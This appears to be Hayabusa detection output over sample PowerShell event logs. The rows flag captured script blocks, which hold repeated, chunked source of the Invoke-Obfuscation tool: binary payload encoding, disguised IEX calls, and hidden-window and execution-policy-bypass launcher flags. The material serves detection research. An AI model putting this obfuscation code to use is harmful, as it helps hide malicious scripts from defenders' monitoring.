-Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and rando",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.266 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBinaryCommand { <# .SYNOPSIS Generates binary encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBinaryCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBinaryCommand encodes an input PowerShell scriptblock or path as a binary payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIn -NoProf ""-Join ('1010111y1110010W1101001{1110100G1100101y101101;1001000T1101111@1110011G1110100y100000@100111y1001000@1100101d1101100<1101100b1101111d100000W1010111@1101111G1110010{1101100@1100100@100001<100111G100000y101101;1000110;1101111y1110010G1100101d1100111y1110010G1101111@1110101W1101110b1100100G1000011;1101111d1101100{1101111y1110010d100000<1000111<1110010T1100101W1100101@1101110d111011{100000T1010111{1110010{1101001{1110100y1100101b101101<1001000y1101111{1110011W1110100d100000d100111b1001111<1100010b1100110<1110101d1110011W1100011W1100001T1110100T1101001{1101111;1101110W100000T1010010b1101111<1100011W1101011;1110011;100001d100111@100000y101101<1000110T1101111G1110010{1100101W1100111{1110010G1101111d1110101W1101110@1100100@1000011{1101111d1101100y1101111T1110010{100000{1000111{1110010T1100101b1100101;1101110'-SplIt'b'-SpLit '@'-SPLIt '{' -SpLIT'<'-SPLIT'd' -SpLIT 'T'-SplIt ';' -SpLiT 'G' -SPLiT'y'-SpLiT'W' | ForEach-Object { ([Char]([Convert]::ToInt16(( $_.ToString() ) ,2) ))} )| IEX"" C:\PS> Out-EncodedBinaryCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX( -Join ('1010111<1110010>1101001a1110100>1100101r101101{1001000@1101111l1110011l1110100a100000<100111m1001000r1100101{1101100{1101100{1101111>100000{1010111>1101111>1110010m1101100O1100100a100001O100111&100000@101101&1000110<1101111a1110010&1100101&1100111O1110010r1101111r1110101<1101110O1100100m1000011{1101111>1101100m1101111{1110010m100000{1000111a1110010>1100101>1100101m1101110&111011O100000r1010111&1110010l1101001{1110100{1100101r101101@1001000&1101111>1110011<1110100&100000>100111a1001111{1100010a1100110@1110101{1110011&1100011r1100001@1110100l1101001>1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001<100111a100000{101101@1000110a1101111{1110010m1100101a1100111>1110010l1101111m1110101l1101110@1100100r1000011&1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@1100101@1101110'.Split( 'l@>{r [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 2 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Binary values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object { # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) } # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and rando",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.266 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.266 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"mizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.266 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"mizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.266 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the 